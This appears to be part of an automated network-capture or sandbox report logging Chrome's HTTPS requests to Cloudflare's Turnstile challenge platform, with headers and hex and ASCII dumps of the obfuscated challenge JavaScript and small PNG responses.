                                                    2024-11-25 18:43:57 UTC331INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:43:57 GMT
                                                    Content-Type: application/javascript; charset=UTF-8
                                                    Content-Length: 115690
                                                    Connection: close
                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c98afa735e7a-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:43:57 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 50 69 6b 62 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uPikb3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                    2024-11-25 18:43:57 UTC1369INData Raw: 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61
                                                    Data Ascii: 20information%3C%2Fa%3E","turnstile_refresh":"Refresh","turnstile_failure":"Error","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20pa
                                                    2024-11-25 18:43:57 UTC1369INData Raw: 2c 67 30 2c 67 36 2c 67 37 2c 67 38 2c 67 69 2c 67 74 2c 67 78 2c 67 45 2c 65 56 2c 65 57 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 36 32 37 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 35 39 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 30 35 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 32 32 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 32 35 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 36 38 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 38 38 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28
                                                    Data Ascii: ,g0,g6,g7,g8,gi,gt,gx,gE,eV,eW){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(627))/1*(parseInt(gI(1159))/2)+-parseInt(gI(1305))/3*(parseInt(gI(1522))/4)+parseInt(gI(725))/5*(-parseInt(gI(1568))/6)+-parseInt(gI(488))/7*(parseInt(
                                                    2024-11-25 18:43:57 UTC1369INData Raw: 68 5b 44 5d 29 29 3a 73 28 6f 5b 67 4e 28 31 34 33 35 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 67 4f 29 7b 67 4f 3d 67 4e 2c 4f 62 6a 65 63 74 5b 67 4f 28 31 33 38 33 29 5d 5b 67 4f 28 31 31 38 30 29 5d 5b 67 4f 28 31 33 39 38 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 67 4f 28 37 33 33 29 5d 28 47 29 7d 7d 2c 65 54 3d 67 4a 28 31 33 34 34 29 5b 67 4a 28 31 35 30 36 29 5d 28 27 3b 27 29 2c 65 55 3d 65 54 5b 67 4a 28 34 35 36 29 5d 5b 67 4a 28 31 32 37 31 29 5d 28 65 54 29 2c 65 4d 5b 67 4a 28 39 38 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 67 51 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 67 51 3d 67 4a 2c 69 3d 7b 27 41 56 6a 71 49 27
                                                    Data Ascii: h[D])):s(o[gN(1435)](i,D),E),C++);return j;function s(G,H,gO){gO=gN,Object[gO(1383)][gO(1180)][gO(1398)](j,H)||(j[H]=[]),j[H][gO(733)](G)}},eT=gJ(1344)[gJ(1506)](';'),eU=eT[gJ(456)][gJ(1271)](eT),eM[gJ(986)]=function(g,h,gQ,i,j,k,l,m){for(gQ=gJ,i={'AVjqI'
                                                    2024-11-25 18:43:57 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 56 45 65 6a 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 63 44 6d 52 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6f 69 6e 69 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 69 43 62 44 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 42 46 50 54 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6b 71 6f 56 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6f 71 6e 74 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d
                                                    Data Ascii: ){return h-i},'VEejm':function(h,i){return h(i)},'cDmRt':function(h,i){return h(i)},'oinii':function(h,i){return i&h},'iCbDw':function(h,i){return h==i},'BFPTh':function(h,i){return h-i},'kqoVW':function(h,i){return h(i)},'oqntb':function(h,i){return i!==
                                                    2024-11-25 18:43:57 UTC1369INData Raw: 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 68 4a 28 31 33 38 33 29 5d 5b 68 4a 28 31 31 38 30 29 5d 5b 68 4a 28 31 33 39 38 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 68 4a 28 31 33 38 33 29 5d 5b 68 4a 28 31 31 38 30 29 5d 5b 68 4a 28 31 33 39 38 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 68 4a 28 31 36 36 32 29 5d 28 32 35 36 2c 43 5b 68 4a 28 31 38 32 32 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 68 4a 28 38 31 34 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 64 5b 68 4a 28 31 34 31 39 29 5d 28 49 2c 64 5b 68 4a 28 31 32 39 34 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 4a 28 37 33 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73
                                                    Data Ascii: )||(x[K]=E++,B[K]=!0),L=C+K,Object[hJ(1383)][hJ(1180)][hJ(1398)](x,L))C=L;else{if(Object[hJ(1383)][hJ(1180)][hJ(1398)](B,C)){if(d[hJ(1662)](256,C[hJ(1822)](0))){for(s=0;d[hJ(814)](s,F);H<<=1,d[hJ(1419)](I,d[hJ(1294)](j,1))?(I=0,G[hJ(733)](o(H)),H=0):I++,s
                                                    2024-11-25 18:43:57 UTC1369INData Raw: 68 4a 28 31 38 32 32 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 4a 28 31 30 31 32 29 5d 28 31 36 2c 73 29 3b 48 3d 64 5b 68 4a 28 31 32 32 37 29 5d 28 48 3c 3c 31 2e 37 32 2c 64 5b 68 4a 28 31 32 36 37 29 5d 28 4d 2c 31 29 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68 4a 28 37 33 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 64 5b 68 4a 28 31 34 34 39 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 68 4a 28 36 38 35 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 7c 64 5b 68 4a 28 31 38 31 30 29 5d 28 4d 2c 31 29 2c 64 5b 68 4a 28 31 34 34 39 29 5d 28 49 2c 6a 2d 31 29 3f 28 49
                                                    Data Ascii: hJ(1822)](0),s=0;d[hJ(1012)](16,s);H=d[hJ(1227)](H<<1.72,d[hJ(1267)](M,1)),I==j-1?(I=0,G[hJ(733)](o(H)),H=0):I++,M>>=1,s++);}D--,d[hJ(1449)](0,D)&&(D=Math[hJ(685)](2,F),F++),delete B[C]}else for(M=x[C],s=0;s<F;H=H<<1|d[hJ(1810)](M,1),d[hJ(1449)](I,j-1)?(I
                                                    2024-11-25 18:43:57 UTC1369INData Raw: 4d 28 38 32 37 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 4d 28 36 30 37 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 68 4d 28 31 34 39 36 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44 5b 68 4d 28 37 33 33 29 5d 28 4f 29 3b 3b 29 7b 69 66 28 49 3e 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 4d 28 36 38 35 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 4d 28 38 32 37 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 4d 28 39 32 31 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74
                                                    Data Ascii: M(827)](o,I++)),J|=(d[hM(607)](0,N)?1:0)*F,F<<=1);O=d[hM(1496)](e,J);break;case 2:return''}for(E=s[3]=O,D[hM(733)](O);;){if(I>i)return'';for(J=0,K=Math[hM(685)](2,C),F=1;K!=F;N=G&H,H>>=1,H==0&&(H=j,G=d[hM(827)](o,I++)),J|=d[hM(921)](0<N?1:0,F),F<<=1);swit
                                                    2024-11-25 18:43:57 UTC1369INData Raw: 68 50 28 31 36 37 33 29 5d 28 31 65 33 2c 65 4d 5b 68 50 28 31 36 37 30 29 5d 5b 68 50 28 31 36 38 39 29 5d 28 32 2e 32 34 3c 3c 66 2c 33 32 29 29 2c 65 4d 5b 68 50 28 35 36 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 51 2c 69 2c 6a 29 7b 28 68 51 3d 68 50 2c 68 51 28 34 37 36 29 3d 3d 3d 65 5b 68 51 28 35 37 39 29 5d 29 3f 28 69 3d 7b 7d 2c 69 5b 68 51 28 31 32 32 35 29 5d 3d 65 5b 68 51 28 31 32 37 36 29 5d 2c 69 5b 68 51 28 36 33 32 29 5d 3d 68 51 28 37 31 32 29 2c 6a 3d 69 2c 65 28 65 5b 68 51 28 37 38 37 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 6b 2c 68 52 29 7b 68 52 3d 68 51 2c 6b 5b 68 52 28 38 31 33 29 5d 3d 6a 5b 68 52 28 31 32 32 35 29 5d 2b 67 2b 6a 5b 68 52 28 36 33 32 29 5d 7d 29 29 3a 65 4d 5b 68 51 28 35 35 32 29 5d 26 26 28 68 51 28 31 37 35 34
                                                    Data Ascii: hP(1673)](1e3,eM[hP(1670)][hP(1689)](2.24<<f,32)),eM[hP(563)](function(hQ,i,j){(hQ=hP,hQ(476)===e[hQ(579)])?(i={},i[hQ(1225)]=e[hQ(1276)],i[hQ(632)]=hQ(712),j=i,e(e[hQ(787)],function(k,hR){hR=hQ,k[hR(813)]=j[hR(1225)]+g+j[hR(632)]})):eM[hQ(552)]&&(hQ(1754
                                                    2024-11-25 18:43:57 UTC1369INData Raw: 27 3a 73 3d 6b 5b 68 53 28 31 36 34 36 29 5d 28 6b 5b 68 53 28 31 37 34 30 29 5d 28 6b 5b 68 53 28 31 30 37 30 29 5d 28 6b 5b 68 53 28 31 33 39 37 29 5d 28 6b 5b 68 53 28 31 37 30 35 29 5d 2c 6e 29 2c 68 53 28 31 34 34 34 29 29 2b 31 2c 68 53 28 31 36 30 34 29 29 2b 65 4d 5b 68 53 28 31 31 34 31 29 5d 5b 68 53 28 36 33 38 29 5d 2b 27 2f 27 2c 65 4d 5b 68 53 28 31 31 34 31 29 5d 2e 63 48 29 2b 27 2f 27 2b 65 4d 5b 68 53 28 31 31 34 31 29 5d 5b 68 53 28 31 37 37 37 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 78 3d 69 7c 7c 68 53 28 36 38 32 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 43 5b 68 53 28 31 37 36 37 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 43 5b 68 53 28 31 33 34 36 29 5d 3d 66 75 6e 63
                                                    Data Ascii: ':s=k[hS(1646)](k[hS(1740)](k[hS(1070)](k[hS(1397)](k[hS(1705)],n),hS(1444))+1,hS(1604))+eM[hS(1141)][hS(638)]+'/',eM[hS(1141)].cH)+'/'+eM[hS(1141)][hS(1777)];continue;case'5':x=i||hS(682);continue;case'6':C[hS(1767)]=5e3;continue;case'7':C[hS(1346)]=func


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.449756104.18.94.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:57 UTC743OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:57 UTC240INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:43:57 GMT
                                                    Content-Type: image/png
                                                    Content-Length: 61
                                                    Connection: close
                                                    cache-control: max-age=2629800, public
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c98c080d7ce4-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:43:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.449757104.18.95.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:58 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:59 UTC240INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:43:59 GMT
                                                    Content-Type: image/png
                                                    Content-Length: 61
                                                    Connection: close
                                                    cache-control: max-age=2629800, public
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c9969cb5c343-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:43:59 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.449758104.18.95.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:59 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e83c97ff9621a48&lang=auto HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:59 UTC331INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:43:59 GMT
                                                    Content-Type: application/javascript; charset=UTF-8
                                                    Content-Length: 117686
                                                    Connection: close
                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c99979434384-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:43:59 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 50 69 6b 62 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uPikb3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                    2024-11-25 18:43:59 UTC1369INData Raw: 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30
                                                    Data Ascii: "turnstile_success":"Success%21","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20
                                                    2024-11-25 18:43:59 UTC1369INData Raw: 2c 66 55 2c 66 59 2c 66 5a 2c 67 39 2c 67 66 2c 67 67 2c 67 47 2c 67 48 2c 67 64 2c 67 65 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 33 36 32 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 33 39 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 39 37 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 31 34 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 37 32 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 33 34 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 31 39 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28
                                                    Data Ascii: ,fU,fY,fZ,g9,gf,gg,gG,gH,gd,ge){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(362))/1+parseInt(gI(1539))/2*(-parseInt(gI(1597))/3)+parseInt(gI(1614))/4+-parseInt(gI(872))/5+-parseInt(gI(834))/6+-parseInt(gI(1519))/7*(parseInt(gI(
                                                    2024-11-25 18:43:59 UTC1369INData Raw: 32 38 33 29 5d 2c 66 5b 67 4d 28 35 30 33 29 5d 29 2c 66 5b 67 4d 28 31 32 38 33 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 66 5b 67 4d 28 31 32 38 33 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 36 38 35 29 5d 28 66 5b 67 4d 28 31 32 38 33 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 31 34 35 34 29 5d 28 66 5b 67 4d 28 31 32 38 33 29 5d 29 29 3b 65 6c 73 65 20 69 66 28 67 4d 28 31 36 33 31 29 21 3d 3d 67 4d 28 32 37 37 29 29 66 5b 67 4d 28 31 32 38 33 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 36 38 35 29 5d 28 66 5b 67 4d 28 31 32 38 33 29 5d 29 3b 65 6c 73 65 20 66 6f 72 28 46 3d 67 4d 28 31 33 37 39 29 5b 67 4d 28 38 33 32 29 5d 28 27 7c 27 29 2c 47 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 46 5b 47 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 4c 3f 4b 5b 67 4d
                                                    Data Ascii: 283)],f[gM(503)]),f[gM(1283)]instanceof Error)f[gM(1283)]=JSON[gM(685)](f[gM(1283)],Object[gM(1454)](f[gM(1283)]));else if(gM(1631)!==gM(277))f[gM(1283)]=JSON[gM(685)](f[gM(1283)]);else for(F=gM(1379)[gM(832)]('|'),G=0;!![];){switch(F[G++]){case'0':L?K[gM
                                                    2024-11-25 18:43:59 UTC1369INData Raw: 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 7d 2c 27 67 58 71 56 43 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 6f 7d 2c 27 73 68 47 68 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 76 6b 65 78 54 27 3a 67 4e 28 38 33 31 29 7d 2c 65 5b 67 4e 28 31 35 35 35 29 5d 28 64 2c 45 72 72 6f 72 29 29 3f 28 66 3d 64 5b 67 4e 28 38 31 37 29 5d 2c 64 5b 67 4e 28 31 36 35 39 29 5d 26 26 74 79 70 65 6f 66 20 64 5b 67 4e 28 31 36 35 39 29 5d 3d 3d 3d 67 4e 28 36 35 35 29 29 26 26 28 6a 3d 64 5b 67 4e 28 31 36 35 39 29 5d 5b 67 4e 28 38 33 32 29 5d 28 27 5c 6e 27 29 2c 65 5b 67 4e 28 31 36 34 37 29 5d 28 6a 5b 67 4e 28 35 35 37 29 5d 2c 31 29 29 26 26
                                                    Data Ascii: ,o){return n instanceof o},'gXqVC':function(n,o){return n>o},'shGhn':function(n,o,s){return n(o,s)},'vkexT':gN(831)},e[gN(1555)](d,Error))?(f=d[gN(817)],d[gN(1659)]&&typeof d[gN(1659)]===gN(655))&&(j=d[gN(1659)][gN(832)]('\n'),e[gN(1647)](j[gN(557)],1))&&
